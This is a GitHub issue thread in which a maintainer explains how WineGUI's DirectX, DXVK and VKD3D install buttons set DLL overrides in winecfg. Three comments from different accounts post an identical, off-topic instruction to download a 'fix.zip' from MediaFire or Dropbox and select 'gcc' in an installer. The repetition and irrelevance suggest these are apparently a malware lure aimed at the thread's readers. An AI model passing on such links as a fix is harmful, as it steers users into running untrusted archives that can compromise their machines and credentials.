### ISSUE TITLE
DirectX

### ISSUE THREAD

**Issue by Aqua1ung** [winegui/WineGUI#31]
@melroy89, how confident are you that these widgets (see screenshot below) install ... whatever it is they _say_ they install?

![Screenshot from 2024-08-25 17-45-51](https://github.com/user-attachments/assets/dc9d7702-2d5a-4126-89bd-e48df424a1c0)

For example, as you can see above, I "installed" DirectX 12, yet the Registry Editor shows this:

![Screenshot from 2024-08-25 17-48-19](https://github.com/user-attachments/assets/324bb078-9080-4e53-87aa-48ffce7a221d)

Am I doing something wrong?

**Comment by melroy89** [comment]
Look at the winecfg dll overrides?

**Comment by Aqua1ung** [comment]
> Look at the winecfg dll overrides?

You mean this?:

![Screenshot from 2024-08-25 18-43-09](https://github.com/user-attachments/assets/6bf948c1-97f6-487f-a911-cd51d49ab859)

What is "native" supposed to mean? Wine or Windows?

**Comment by melroy89** [comment]
Yes so at libraries you see the dll overrides. Which are dll installed when clicking on that button. Native will try to use those new dlls.

Builtin is wine, native is windows. Native just means it tries to load the dll from the system folder. Which is again correct since there is VKD3D installed.

The options you have are:

- opengl d3dx9 (directx 9)
- dxvk using vulkan for directx 9, 10 and 11 games. 
- VKD3D for directx 12 using vulkan. Again only for directx 12 games. 

Most semi-modern games are most likely dxvk. Unless you are sure it's a directx 12 game.

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Aqua1ung** [comment]
@melroy89, thank you! Let me recap what I understand so far, and let me know if I am wrong: If you choose to install DirectX using the "Configure machine" wizard, DirectX gets _installed_, yet it does _not_ override the "native" DirectX until you _explicitly specify_ that, is that so?

From what you say I also understand that, should I want the native DirectX 11 dll to be overriden by the _builtin_ one (which is, indeed, what I want), I have to find the `dxvk` entry in the "New override for library" dropdown list, add it, and edit the entry to specify "builtin," is that so? Trouble is, I can't find any `dxvk` entry in that dropdown list! What entry should I choose?

**Comment by melroy89** [comment]
No that is not what I said.

1. You can only pick one installation at the time. Selecting multiple might result into a broken Wine bottle / machine.
2. Pressing the install button in the "Configure machine" window, will install either DD3DX9, DXVK or VKD3D for you, and apply the correct overrides for you as well automatically. No manual actions need to be done.
![image](https://github.com/user-attachments/assets/acf2b0c2-8a24-4cf4-a24a-c13c69e670be)
3. Removing is too bad not possible, due to the limitations of those packages in Wine. However you can just create a new machine and press the correct install button.
4. Hovering you mouse over the buttons, will give you more information. As stated at the top of the Configure machine screen.
5. Wine Config -> Libraries only give you some indication what is going on, you do need to worry about it. In fact, you don't even need to go to winecfg at all. The 3 install buttons I mentioned earlier are a "one button" install feature, again no additional steps are required after that. Just press and forget and try to install & run your game.
